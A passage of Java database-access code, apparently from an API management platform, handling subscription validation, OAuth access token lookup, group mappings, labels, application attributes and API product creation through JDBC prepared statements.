null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(true); ps = conn.prepareStatement(sql); ps.setString(1, context); ps.setString(2, consumerKey); if (!isAdvancedThrottleEnabled) { if (!defaultVersionInvoked) { ps.setString(3, version); } } else { ps.setInt(3, apiOwnerTenantId); if (!defaultVersionInvoked) { ps.setString(4, version); } } rs = ps.executeQuery(); if (rs.next()) { String subscriptionStatus = rs.getString("SUB_STATUS"); String type = rs.getString("KEY_TYPE"); if (APIConstants.SubscriptionStatus.BLOCKED.equals(subscriptionStatus)) { infoDTO.setValidationStatus(APIConstants.KeyValidationStatus.API_BLOCKED); infoDTO.setAuthorized(false); return infoDTO; } else if (APIConstants.SubscriptionStatus.ON_HOLD.equals(subscriptionStatus) || APIConstants.SubscriptionStatus.REJECTED.equals(subscriptionStatus)) { infoDTO.setValidationStatus( APIConstants.KeyValidationStatus.SUBSCRIPTION_INACTIVE); infoDTO.setAuthorized(false); return infoDTO; } else if (APIConstants.SubscriptionStatus.PROD_ONLY_BLOCKED .equals(subscriptionStatus) && !APIConstants.API_KEY_TYPE_SANDBOX.equals(type)) { infoDTO.setValidationStatus(APIConstants.KeyValidationStatus.API_BLOCKED); infoDTO.setType(type); infoDTO.setAuthorized(false); return infoDTO; } String tokenType = rs.getString("TOKEN_TYPE"); if (APIConstants.JWT.equals(tokenType)) { infoDTO.setAuthorized(false); return infoDTO; } final String API_PROVIDER = rs.getString("API_PROVIDER"); final String SUB_TIER = rs.getString("TIER_ID"); final String APP_TIER = rs.getString("APPLICATION_TIER"); infoDTO.setTier(SUB_TIER); infoDTO.setSubscriber(rs.getString("USER_ID")); infoDTO.setApplicationId(rs.getString("APPLICATION_ID")); infoDTO.setApiName(rs.getString("API_NAME")); infoDTO.setApiPublisher(API_PROVIDER); infoDTO.setApplicationName(rs.getString("NAME")); infoDTO.setApplicationTier(APP_TIER); infoDTO.setType(type); //Advanced Level Throttling Related Properties if (APIUtil.isAdvanceThrottlingEnabled()) { String apiTier = rs.getString("API_TIER"); String subscriberUserId = rs.getString("USER_ID"); String subscriberTenant = MultitenantUtils.getTenantDomain(subscriberUserId); int apiId = rs.getInt("API_ID"); int subscriberTenantId = APIUtil.getTenantId(subscriberUserId); int apiTenantId = APIUtil.getTenantId(API_PROVIDER); //TODO isContentAware boolean isContentAware = isAnyPolicyContentAware(conn, apiTier, APP_TIER, SUB_TIER, subscriberTenantId, apiTenantId, apiId); infoDTO.setContentAware(isContentAware); //TODO this must implement as a part of throttling implementation. int spikeArrest = 0; String apiLevelThrottlingKey = "api_level_throttling_key"; if (rs.getInt("RATE_LIMIT_COUNT") > 0) { spikeArrest = rs.getInt("RATE_LIMIT_COUNT"); } String spikeArrestUnit = null; if (rs.getString("RATE_LIMIT_TIME_UNIT") != null) { spikeArrestUnit = rs.getString("RATE_LIMIT_TIME_UNIT"); } boolean stopOnQuotaReach = rs.getBoolean("STOP_ON_QUOTA_REACH"); List<String> list = new ArrayList<String>(); list.add(apiLevelThrottlingKey); infoDTO.setSpikeArrestLimit(spikeArrest); infoDTO.setSpikeArrestUnit(spikeArrestUnit); infoDTO.setStopOnQuotaReach(stopOnQuotaReach); infoDTO.setSubscriberTenantDomain(subscriberTenant); if (apiTier != null && apiTier.trim().length() > 0) { infoDTO.setApiTier(apiTier); } //We also need to set throttling data list associated with given API. This need to have policy id and // condition id list for all throttling tiers associated with this API. infoDTO.setThrottlingDataList(list); } infoDTO.setAuthorized(true); return infoDTO; } infoDTO.setAuthorized(false); infoDTO.setValidationStatus( APIConstants.KeyValidationStatus.API_AUTH_RESOURCE_FORBIDDEN); } catch (SQLException e) { handleException("Exception occurred while validating Subscription.", e); } finally { try { conn.setAutoCommit(false); } catch (SQLException e) { log.error("Error occurred while fetching data: " + e.getMessage(), e); } APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return infoDTO; } /** * Returns a Prepared statement after setting all the dynamic parameters. Dynamic parameters will be added in * the place of $params in query string * * @param conn connection which will be used to create a prepared statement * @param query dynamic query string which will be modified. * @param params list of parameters * @param startingParamIndex index from which the parameter numbering will start. * @return * @throws SQLException */ public PreparedStatement fillQueryParams(Connection conn, String query, String params[], int startingParamIndex) throws SQLException { String paramString = ""; for (int i = 1; i <= params.length; i++) { if (i == params.length) { paramString = paramString + "?"; } else { paramString = paramString + "?,"; } } query = query.replace("$params", paramString); if (log.isDebugEnabled()) { log.info("Prepared statement query :" + query); } PreparedStatement preparedStatement = conn.prepareStatement(query); for (int i = 0; i < params.length; i++) { preparedStatement.setString(startingParamIndex, params[i]); startingParamIndex++; } return preparedStatement; } /** * Returns True if AM_APPLICATION_GROUP_MAPPING table exist in AM DB * * @return */ public boolean isGrpIdMappingTableExist() { String sql = "SELECT * FROM AM_APPLICATION_GROUP_MAPPING"; Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sql); rs = ps.executeQuery(); } catch (SQLException e) { log.info("AM_APPLICATION_GROUP_MAPPING :- " + e.getMessage(), e); return false; } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return true; } /** * Adds a new record in AM_APPLICATION_GROUP_MAPPING for each group * * @param conn * @param applicationId * @param groupIdString group id values separated by commas * @return * @throws APIManagementException */ private boolean updateGroupIDMappings(Connection conn, int applicationId, String groupIdString, String tenant) throws APIManagementException { boolean updateSuccessful = false; PreparedStatement removeMigratedGroupIdsStatement = null; PreparedStatement deleteStatement = null; PreparedStatement insertStatement = null; String deleteQuery = SQLConstants.REMOVE_GROUP_ID_MAPPING_SQL; String insertQuery = SQLConstants.ADD_GROUP_ID_MAPPING_SQL; try { // Remove migrated Group ID information so that it can be replaced by updated Group ID's that are now // being saved. This is done to ensure that there is no conflicting migrated Group ID data remaining removeMigratedGroupIdsStatement = conn.prepareStatement(SQLConstants.REMOVE_MIGRATED_GROUP_ID_SQL); removeMigratedGroupIdsStatement.setInt(1, applicationId); removeMigratedGroupIdsStatement.executeUpdate(); deleteStatement = conn.prepareStatement(deleteQuery); deleteStatement.setInt(1, applicationId); deleteStatement.executeUpdate(); if (!StringUtils.isEmpty(groupIdString)) { String[] groupIdArray = groupIdString.split(","); insertStatement = conn.prepareStatement(insertQuery); for (String group : groupIdArray) { insertStatement.setInt(1, applicationId); insertStatement.setString(2, group); insertStatement.setString(3, tenant); insertStatement.addBatch(); } insertStatement.executeBatch(); } updateSuccessful = true; } catch (SQLException e) { updateSuccessful = false; handleException("Failed to update GroupId mappings ", e); } finally { APIMgtDBUtil.closeAllConnections(removeMigratedGroupIdsStatement, null, null); APIMgtDBUtil.closeAllConnections(deleteStatement, null, null); APIMgtDBUtil.closeAllConnections(insertStatement, null, null); } return updateSuccessful; } /** * Fetches all the groups for a given application and creates a single string separated by comma * * @param applicationId * @return comma separated group Id String * @throws APIManagementException */ public String getGroupId(int applicationId) throws APIManagementException { String grpId = ""; ArrayList<String> grpIdList = new ArrayList<String>(); PreparedStatement preparedStatement = null; Connection conn = null; ResultSet resultSet = null; String sqlQuery = SQLConstants.GET_GROUP_ID_SQL; try { conn = APIMgtDBUtil.getConnection(); preparedStatement = conn.prepareStatement(sqlQuery); preparedStatement.setInt(1, applicationId); resultSet = preparedStatement.executeQuery(); while (resultSet.next()) { grpIdList.add(resultSet.getString("GROUP_ID")); } for (int i = 0; i < grpIdList.size(); i++) { if (i == grpIdList.size() - 1) { grpId = grpId + grpIdList.get(i); } else { grpId = grpId + grpIdList.get(i) + ","; } } } catch (SQLException e) { handleException("Failed to Retrieve GroupId for application " + applicationId, e); } finally { APIMgtDBUtil.closeAllConnections(preparedStatement, conn, resultSet); } return grpId; } /** * Get access token information associated with the given consumer key. * * @param consumerKey The consumer key. * @return APIKey The access token information. * @throws SQLException * @throws CryptoException */ public APIKey getAccessTokenInfoByConsumerKey(String consumerKey) throws SQLException, CryptoException, APIManagementException { String accessTokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; String username = getUserIdFromConsumerKey(consumerKey); accessTokenStoreTable = getAccessTokenStoreTableNameOfUserId(username, accessTokenStoreTable); Connection connection = null; PreparedStatement preparedStatement = null; ResultSet resultSet = null; String statement = SQLConstants.GET_ACCESS_TOKEN_INFO_BY_CONSUMER_KEY_PREFIX + accessTokenStoreTable + SQLConstants.GET_ACCESS_TOKEN_INFO_BY_CONSUMER_KEY_SUFFIX; String oracleSQL = SQLConstants.GET_ACCESS_TOKEN_INFO_BY_CONSUMER_KEY_ORACLE_PREFIX + accessTokenStoreTable + SQLConstants.GET_ACCESS_TOKEN_INFO_BY_CONSUMER_KEY_ORACLE_SUFFIX; String mySQL = "SELECT" + statement; String db2SQL = "SELECT" + statement; String msSQL = "SELECT " + statement; String postgreSQL = "SELECT * FROM (SELECT" + statement + ") AS TOKEN"; String accessToken; String sql; try { connection = APIMgtDBUtil.getConnection(); if (connection.getMetaData().getDriverName().contains("MySQL") || connection.getMetaData().getDriverName ().contains("H2")) { sql = mySQL; } else if (connection.getMetaData().getDatabaseProductName().contains("DB2")) { sql = db2SQL; } else if (connection.getMetaData().getDriverName().contains("MS SQL") || connection.getMetaData() .getDriverName().contains("Microsoft")) { sql = msSQL; } else if (connection.getMetaData().getDriverName().contains("PostgreSQL")) { sql = postgreSQL; } else { sql = oracleSQL; } preparedStatement = connection.prepareStatement(sql); preparedStatement.setString(1, consumerKey); preparedStatement.setString(2, APIConstants.ACCESS_TOKEN_USER_TYPE_APPLICATION); resultSet = preparedStatement.executeQuery(); if (resultSet.next()) { APIKey apiKey = new APIKey(); accessToken = APIUtil.decryptToken(resultSet.getString("ACCESS_TOKEN")); apiKey.setConsumerKey(consumerKey); String consumerSecret = resultSet.getString("CONSUMER_SECRET"); apiKey.setConsumerSecret(APIUtil.decryptToken(consumerSecret)); apiKey.setAccessToken(accessToken); apiKey.setValidityPeriod(resultSet.getLong("VALIDITY_PERIOD") / 1000); apiKey.setGrantTypes(resultSet.getString("GRANT_TYPES")); apiKey.setCallbackUrl(resultSet.getString("CALLBACK_URL")); // Load all the rows to in memory and build the scope string List<String> scopes = new ArrayList<String>(); String tokenString = resultSet.getString("ACCESS_TOKEN"); do { String currentRowTokenString = resultSet.getString("ACCESS_TOKEN"); if (tokenString.equals(currentRowTokenString)) { scopes.add(resultSet.getString(APIConstants.IDENTITY_OAUTH2_FIELD_TOKEN_SCOPE)); } } while (resultSet.next()); apiKey.setTokenScope(getScopeString(scopes)); return apiKey; } return null; } finally { APIMgtDBUtil.closeAllConnections(preparedStatement, connection, resultSet); } } /** * Returns the user id for the consumer key. * * @param consumerKey The consumer key. * @return String The user id. */ private String getUserIdFromConsumerKey(String consumerKey) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String userId = null; String sqlQuery = SQLConstants.GET_USER_ID_FROM_CONSUMER_KEY_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, consumerKey); rs = prepStmt.executeQuery(); while (rs.next()) { userId = rs.getString("USER_ID"); } } catch (SQLException e) { handleException("Error when getting the user id for Consumer Key" + consumerKey, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return userId; } /** * Get Subscribed APIs for an App. * * @param applicationName id of the application name * @return APISubscriptionInfoDTO[] * @throws APIManagementException if failed to get Subscribed APIs */ public APISubscriptionInfoDTO[] getSubscribedAPIsForAnApp(String userId, String applicationName) throws APIManagementException { List<APISubscriptionInfoDTO> apiSubscriptionInfoDTOS = new ArrayList<APISubscriptionInfoDTO>(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; //identify logged in user String loginUserName = getLoginUserName(userId); int tenantId = APIUtil.getTenantId(loginUserName); String sqlQuery = SQLConstants.GET_SUBSCRIBED_APIS_OF_USER_BY_APP_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_SUBSCRIBED_APIS_OF_USER_BY_APP_CASE_INSENSITIVE_SQL; } try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, tenantId); ps.setString(2, applicationName); rs = ps.executeQuery(); while (rs.next()) { APISubscriptionInfoDTO infoDTO = new APISubscriptionInfoDTO(); infoDTO.setProviderId(APIUtil.replaceEmailDomain(rs.getString("API_PROVIDER"))); infoDTO.setApiName(rs.getString("API_NAME")); infoDTO.setContext(rs.getString("API_CONTEXT")); infoDTO.setVersion(rs.getString("API_VERSION")); infoDTO.setSubscriptionTier(rs.getString("SP_TIER_ID")); apiSubscriptionInfoDTOS.add(infoDTO); } } catch (SQLException e) { handleException("Error while executing SQL", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return apiSubscriptionInfoDTOS.toArray(new APISubscriptionInfoDTO[apiSubscriptionInfoDTOS.size()]); } public Application getApplicationByClientId(String clientId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; Application application = null; try { connection = APIMgtDBUtil.getConnection(); String query = SQLConstants.GET_APPLICATION_BY_CLIENT_ID_SQL; prepStmt = connection.prepareStatement(query); prepStmt.setString(1, clientId); rs = prepStmt.executeQuery(); if (rs.next()) { String applicationId = rs.getString("APPLICATION_ID"); String applicationName = rs.getString("NAME"); String applicationOwner = rs.getString("CREATED_BY"); application = new Application(applicationId); application.setName(applicationName); application.setOwner(applicationOwner); application.setDescription(rs.getString("DESCRIPTION")); application.setStatus(rs.getString("APPLICATION_STATUS")); application.setCallbackUrl(rs.getString("CALLBACK_URL")); application.setId(rs.getInt("APPLICATION_ID")); application.setGroupId(rs.getString("GROUP_ID")); application.setUUID(rs.getString("UUID")); application.setTier(rs.getString("APPLICATION_TIER")); application.setTokenType(rs.getString("TOKEN_TYPE")); application.setKeyType(rs.getString("KEY_TYPE")); if (multiGroupAppSharingEnabled) { if (application.getGroupId() == null || application.getGroupId().isEmpty()) { application.setGroupId(getGroupId(application.getId())); } } } } catch (SQLException e) { handleException("Error while obtaining details of the Application foe client id " + clientId, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return application; } /** * Returns the Label List for the TenantId. * * @param tenantDomain The tenant domain. * @return List of labels. */ public List<Label> getAllLabels(String tenantDomain) throws APIManagementException { List<Label> labelList = new ArrayList<>(); try (Connection connection = APIMgtDBUtil.getConnection(); PreparedStatement statement = connection.prepareStatement(SQLConstants.GET_LABEL_BY_TENANT)) { try { connection.setAutoCommit(false); statement.setString(1, tenantDomain); try (ResultSet rs = statement.executeQuery()) { while (rs.next()) { String labelId = rs.getString("LABEL_ID"); String labelName = rs.getString("NAME"); String description = rs.getString("DESCRIPTION"); Label label = new Label(); label.setLabelId(labelId); label.setName(labelName); label.setDescription(description); label.setAccessUrls(getAccessUrlList(connection, labelId)); labelList.add(label); } } connection.commit(); } catch (SQLException e) { connection.rollback(); handleException("Failed to get Labels of " + tenantDomain, e); } finally { connection.setAutoCommit(true); } } catch (SQLException e) { handleException("Failed to get Labels of " + tenantDomain, e); } return labelList; } /** * Returns the URL list for label id. * * @param labelId label id. * @return List of string. */ private List<String> getAccessUrlList(Connection connection, String labelId) throws APIManagementException { List<String> hostList = new ArrayList<>(); try (PreparedStatement statement = connection.prepareStatement(SQLConstants.GET_URL_BY_LABEL_ID)) { statement.setString(1, labelId); try (ResultSet rs = statement.executeQuery()) { while (rs.next()) { String host = rs.getString("ACCESS_URL"); hostList.add(host); } } } catch (SQLException e) { handleException("Failed to get label list: " , e); } return hostList; } /** * Returns the Label. * * @param tenantDomain The tenant domain. * @param label label object. * @return label. */ public Label addLabel(String tenantDomain, Label label) throws APIManagementException { String uuid = UUID.randomUUID().toString(); label.setLabelId(uuid); try (Connection connection = APIMgtDBUtil.getConnection(); PreparedStatement statement = connection.prepareStatement(SQLConstants.ADD_LABEL_SQL)) { try { initialAutoCommit = connection.getAutoCommit(); connection.setAutoCommit(false); statement.setString(1, uuid); statement.setString(2, label.getName()); statement.setString(3, label.getDescription()); statement.setString(4, tenantDomain); statement.executeUpdate(); if (!label.getAccessUrls().isEmpty()) { insertAccessUrlMappings(connection, uuid, label.getAccessUrls()); } connection.commit(); } catch (SQLException e) { connection.rollback(); handleException("Failed to add label: " + uuid, e); } finally { APIMgtDBUtil.setAutoCommit(connection, initialAutoCommit); } } catch (SQLException e) { handleException("Failed to add label: " + uuid, e); } return label; } /** * Insert URL to the URL table * * @param uuid label id. * @param urlList The list of url. * @throws APIManagementException */ private void insertAccessUrlMappings(Connection connection, String uuid, List<String> urlList) throws APIManagementException { try (PreparedStatement statement = connection.prepareStatement(SQLConstants.ADD_LABEL_URL_MAPPING_SQL)) { for (String accessUrl : urlList) { statement.setString(1, uuid); statement.setString(2, accessUrl); statement.addBatch(); } statement.executeBatch(); } catch (SQLException e) { handleException("Failed to add label url : " + uuid, e); } } /** * Delete label. * * @param labelUUID label id. * @throws APIManagementException */ public void deleteLabel(String labelUUID) throws APIManagementException { try (Connection connection = APIMgtDBUtil.getConnection(); PreparedStatement statement = connection.prepareStatement(SQLConstants.DELETE_LABEL_SQL)) { try { initialAutoCommit = connection.getAutoCommit(); connection.setAutoCommit(false); statement.setString(1, labelUUID); statement.executeUpdate(); connection.commit(); } catch (SQLException e) { connection.rollback(); handleException("Failed to delete label : " + labelUUID, e); } finally { APIMgtDBUtil.setAutoCommit(connection, initialAutoCommit); } } catch (SQLException e) { handleException("Failed to delete label : " + labelUUID, e); } } /** * Delete label URL * * @param labelUUID label id. * @throws APIManagementException */ private void deleteAccessUrlMappings(Connection connection, String labelUUID) throws APIManagementException { try (PreparedStatement statement = connection.prepareStatement(SQLConstants.DELETE_LABEL_URL_MAPPING_SQL)) { statement.setString(1, labelUUID); statement.executeUpdate(); } catch (SQLException e) { handleException("Failed to delete label url : ", e); } } /** * Update the label. * * @param label label object. * @return labels. */ public Label updateLabel(Label label) throws APIManagementException { List<String> accessURLs = label.getAccessUrls(); try (Connection connection = APIMgtDBUtil.getConnection(); PreparedStatement statement = connection.prepareStatement(SQLConstants.UPDATE_LABEL_SQL)) { try { initialAutoCommit = connection.getAutoCommit(); connection.setAutoCommit(false); statement.setString(1, label.getName()); statement.setString(2, label.getDescription()); statement.setString(3, label.getLabelId()); deleteAccessUrlMappings(connection, label.getLabelId()); insertAccessUrlMappings(connection, label.getLabelId(), accessURLs); statement.executeUpdate(); connection.commit(); } catch (SQLException e) { connection.rollback(); handleException("Failed to update label : ", e); } finally { APIMgtDBUtil.setAutoCommit(connection, initialAutoCommit); } } catch (SQLException e) { handleException("Failed to update label : ", e); } return label; } private void addApplicationAttributes(Connection conn, Map<String, String> attributes, int applicationId, int tenantId) throws APIManagementException { PreparedStatement ps = null; ResultSet rs = null; try { if(attributes != null) { ps = conn.prepareStatement(SQLConstants.ADD_APPLICATION_ATTRIBUTES_SQL); for (String key : attributes.keySet()) { ps.setInt(1, applicationId); ps.setString(2, key); ps.setString(3, attributes.get(key)); ps.setInt(4, tenantId); ps.addBatch(); } int[] update = ps.executeBatch(); } } catch (SQLException e) { handleException("Error in adding attributes of application with id: " + applicationId , e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, rs); } } /** * Get all attributes stored against an Application * * @param conn Database connection * @param applicationId * @throws APIManagementException */ public Map<String, String> getApplicationAttributes(Connection conn, int applicationId) throws APIManagementException { PreparedStatement ps = null; ResultSet rs = null; Map<String, String> applicationAttributes = new HashMap<>(); try { ps = conn.prepareStatement(SQLConstants.GET_APPLICATION_ATTRIBUTES_BY_APPLICATION_ID); ps.setInt(1, applicationId); rs = ps.executeQuery(); while (rs.next()) { applicationAttributes.put(rs.getString("NAME"), rs.getString("VALUE")); } } catch (SQLException e) { handleException("Error when reading attributes of application with id: " + applicationId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, rs); } return applicationAttributes; } /** * Delete certain attribute stored against an Application * * @param attributeKey User defined key of attribute * @param applicationId * @throws APIManagementException */ public void deleteApplicationAttributes(String attributeKey, int applicationId) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); ps = connection.prepareStatement(SQLConstants.REMOVE_APPLICATION_ATTRIBUTES_BY_ATTRIBUTE_NAME_SQL); ps.setString(1, attributeKey); ps.setInt(2, applicationId); ps.execute(); connection.commit(); } catch (SQLException e) { handleException("Error in establishing SQL connection ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, null); } } /** * Add new attributes against an Application in API Store * * @param applicationAttributes Map of key, value pair of attributes * @param applicationId Id of Application against which attributes are getting stored * @param tenantId Id of tenant * @throws APIManagementException */ public void addApplicationAttributes(Map<String, String> applicationAttributes, int applicationId, int tenantId) throws APIManagementException { Connection connection = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); addApplicationAttributes(connection, applicationAttributes, applicationId, tenantId); connection.commit(); } catch (SQLException sqlException) { if (connection != null) { try { connection.rollback(); } catch (SQLException e) { log.error("Failed to rollback add application attributes ", e); } } handleException("Failed to add Application", sqlException); } finally { APIMgtDBUtil.closeAllConnections(null, connection, null); } } /** * Converts all null values for THROTTLING_TIER in AM_API_URL_MAPPING table, to Unlimited. * This will be executed only during startup of the server. * * @throws APIManagementException */ public void convertNullThrottlingTiers() throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; String query = SQLConstants.FIX_NULL_THROTTLING_TIERS; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmt = connection.prepareStatement(query); prepStmt.execute(); connection.commit(); } catch (SQLException e) { handleException( "Error occurred while converting NULL throttling tiers to Unlimited in AM_API_URL_MAPPING table", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } } /** * Retrieves the Application which is corresponding to the given UUID String * * @param subscriberId subscriberId of the Application * @param applicationName name of the Application * @return * @throws APIManagementException */ public Application getApplicationBySubscriberIdAndName(int subscriberId, String applicationName) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; int applicationId = 0; Application application = null; try { connection = APIMgtDBUtil.getConnection(); String query = SQLConstants.GET_APPLICATION_BY_SUBSCRIBERID_AND_NAME_SQL; prepStmt = connection.prepareStatement(query); prepStmt.setInt(1, subscriberId); prepStmt.setString(2, applicationName); rs = prepStmt.executeQuery(); if (rs.next()) { String subscriberName = rs.getString("USER_ID"); Subscriber subscriber = new Subscriber(subscriberName); subscriber.setId(subscriberId); application = new Application(applicationName, subscriber); application.setDescription(rs.getString("DESCRIPTION")); application.setStatus(rs.getString("APPLICATION_STATUS")); application.setCallbackUrl(rs.getString("CALLBACK_URL")); applicationId = rs.getInt("APPLICATION_ID"); application.setId(applicationId); application.setGroupId(rs.getString("GROUP_ID")); application.setUUID(rs.getString("UUID")); application.setTier(rs.getString("APPLICATION_TIER")); application.setTokenType(rs.getString("TOKEN_TYPE")); subscriber.setId(rs.getInt("SUBSCRIBER_ID")); if (multiGroupAppSharingEnabled) { if (application.getGroupId().isEmpty()) { application.setGroupId(getGroupId(application.getId())); } } Timestamp createdTime = rs.getTimestamp("CREATED_TIME"); application.setCreatedTime(createdTime == null ? null : String.valueOf(createdTime.getTime())); try { Timestamp updated_time = rs.getTimestamp("UPDATED_TIME"); application.setLastUpdatedTime( updated_time == null ? null : String.valueOf(updated_time.getTime())); } catch (SQLException e) { application.setLastUpdatedTime(application.getCreatedTime()); } } if (application != null) { Map<String, String> applicationAttributes = getApplicationAttributes(connection, applicationId); application.setApplicationAttributes(applicationAttributes); } } catch (SQLException e) { handleException("Error while obtaining details of the Application : " + applicationName + " of " + subscriberId, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return application; } /** * Retrieve URI Templates for the given API * @param api API * @return Map of URITemplate with key as Method:resourcepath * @throws APIManagementException exception */ public Map<String, URITemplate> getURITemplatesForAPI(API api) throws APIManagementException { Map<String, URITemplate> templatesMap = new HashMap<String, URITemplate>(); Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; try { connection = APIMgtDBUtil.getConnection(); //TODO move to constant String query = "SELECT URL_PATTERN , URL_MAPPING_ID, HTTP_METHOD FROM AM_API API , AM_API_URL_MAPPING URL " + "WHERE API.API_ID = URL.API_ID AND API.API_NAME =? " + "AND API.API_VERSION=? AND API.API_PROVIDER=?"; prepStmt = connection.prepareStatement(query); prepStmt.setString(1, api.getId().getApiName()); prepStmt.setString(2, api.getId().getVersion()); prepStmt.setString(3, api.getId().getProviderName()); rs = prepStmt.executeQuery(); while (rs.next()) { URITemplate template = new URITemplate(); String urlPattern = rs.getString("URL_PATTERN"); String httpMethod = rs.getString("HTTP_METHOD"); template.setHTTPVerb(httpMethod); template.setResourceURI(urlPattern); template.setId(rs.getInt("URL_MAPPING_ID")); //TODO populate others if needed templatesMap.put(httpMethod + ":" + urlPattern, template); } } catch (SQLException e) { handleException("Error while obtaining details of the URI Template for api " + api.getId() , e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return templatesMap; } public void addAPIProduct(APIProduct apiproduct, String tenantDomain) throws APIManagementException { Connection connection = null; PreparedStatement prepStmtAddAPIProduct = null; PreparedStatement prepStmtAddResourceMapping = null; PreparedStatement prepStmtAddScopeEntry = null; PreparedStatement prepStmtAddScopeLink = null; PreparedStatement prepStmtAddScopeResourceMapping = null; ResultSet rs = null; int productId = 0; int scopeId = 0; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); //TODO move to constant :version? String queryAddAPIProduct = "INSERT INTO " + "AM_API_PRODUCT(API_PRODUCT_PROVIDER,API_PRODUCT_NAME," + "DESCRIPTION, API_PRODUCT_TIER,CREATED_BY," + "VISIBILITY,SUBSCRIPTION_AVAILABILITY,UUID,TENANT_DOMAIN,STATE,API_PRODUCT_VERSION) " + "VALUES (?,?,?,?,?,?,?,?,?,?,?)"; prepStmtAddAPIProduct = connection.prepareStatement(queryAddAPIProduct, new String[]{"api_product_id"}); prepStmtAddAPIProduct.setString(1, apiproduct.getProvider()); prepStmtAddAPIProduct.setString(2, apiproduct.getName()); prepStmtAddAPIProduct.setString(3, apiproduct.getDescription()); prepStmtAddAPIProduct.setString(4, apiproduct.getProductTier()); prepStmtAddAPIProduct.setString(5, apiproduct.getProvider()); //TODO get the created user prepStmtAddAPIProduct.setString(6, apiproduct.getVisibility()); prepStmtAddAPIProduct.setString(7, apiproduct.getSubscriptionAvailability()); prepStmtAddAPIProduct.setString(8, apiproduct.getUuid()); prepStmtAddAPIProduct.setString(9, tenantDomain); prepStmtAddAPIProduct.setString(10, apiproduct.getState() == null? "CREATED" : apiproduct.getState()); //TODO move to constant prepStmtAddAPIProduct.setString(11, "0"); //TODO move to constant prepStmtAddAPIProduct.execute(); rs = prepStmtAddAPIProduct.getGeneratedKeys(); if (rs.next()) { productId = rs.getInt(1); } //breaks the flow if product is not added to the db correctly if(productId == 0) { throw new APIManagementException("Error while adding API product " + apiproduct.getUuid()); } //add product scope //TODO finalize format and move to constants String productScopeKey = "productscope-" + apiproduct.getName() + ":" +apiproduct.getProvider(); //for now use key for display name as well TODO check and modify String productScopeDisplayName = productScopeKey; Scope productScope = new Scope(); productScope.setKey(productScopeKey); productScope.setName(productScopeDisplayName); String queryAddScopeEntry = SQLConstants.ADD_SCOPE_ENTRY_SQL; prepStmtAddScopeEntry = connection.prepareStatement(queryAddScopeEntry, new String[]{"scope_id"}); prepStmtAddScopeEntry.setString(1, productScope.getKey()); prepStmtAddScopeEntry.setString(2, productScope.getName()); prepStmtAddScopeEntry.setString(3, productScope.getDescription()); prepStmtAddScopeEntry.setInt(4, APIUtil.getTenantIdFromTenantDomain(tenantDomain)); prepStmtAddScopeEntry.execute(); rs = prepStmtAddScopeEntry.getGeneratedKeys(); if (rs.next()){ scopeId = rs.getInt(1); } //breaks the flow if product scope is not added to the db correctly if (scopeId == 0) { throw new APIManagementException("Error while adding scope for API product : " + apiproduct.getUuid()); } productScope.setId(scopeId); //add scope - api mapping String scopeLink = SQLConstants.ADD_SCOPE_LINK_SQL; prepStmtAddScopeLink = connection.prepareStatement(scopeLink); //TODO move to constant String queryAddResourceMapping = "INSERT INTO AM_API_PRODUCT_MAPPING (API_PRODUCT_ID,URL_MAPPING_ID) " + "VALUES (?, ?)"; prepStmtAddResourceMapping = connection.prepareStatement(queryAddResourceMapping); String queryAddScopeResourceMapping = SQLConstants.ADD_OAUTH2_RESOURCE_SCOPE_SQL; prepStmtAddScopeResourceMapping = connection.prepareStatement(queryAddScopeResourceMapping); //add the resources in each API in the API product. Add the resource_ma List<APIProductResource> productApis = apiproduct.getProductResources(); for (APIProductResource apiProductResource : productApis) { APIIdentifier apiIdentifier = apiProductResource.getApiIdentifier(); int apiID = getAPIID(apiIdentifier, connection); prepStmtAddScopeLink.setInt(1, apiID); prepStmtAddScopeLink.setInt(2, scopeId); prepStmtAddScopeLink.addBatch(); List<URITemplate> uriTemplates = apiProductResource.getResources(); for (URITemplate uriTemplate : uriTemplates) { prepStmtAddResourceMapping.setInt(1, productId); prepStmtAddResourceMapping.setInt(2, uriTemplate.getId()); prepStmtAddResourceMapping.addBatch(); //add scope uri temaplate mapping String resourceKey = APIUtil .getResourceKey(getAPIContext(apiIdentifier), apiIdentifier.getVersion(), uriTemplate.getResourceURI(), uriTemplate.getHTTPVerb()); prepStmtAddScopeResourceMapping.setString(1, resourceKey); prepStmtAddScopeResourceMapping.setInt(2, scopeId); prepStmtAddScopeResourceMapping.setInt(3, APIUtil.getTenantIdFromTenantDomain(tenantDomain)); prepStmtAddScopeResourceMapping.addBatch(); } } prepStmtAddScopeLink.executeBatch(); prepStmtAddScopeLink.clearBatch(); prepStmtAddResourceMapping.executeBatch(); prepStmtAddResourceMapping.clearBatch(); 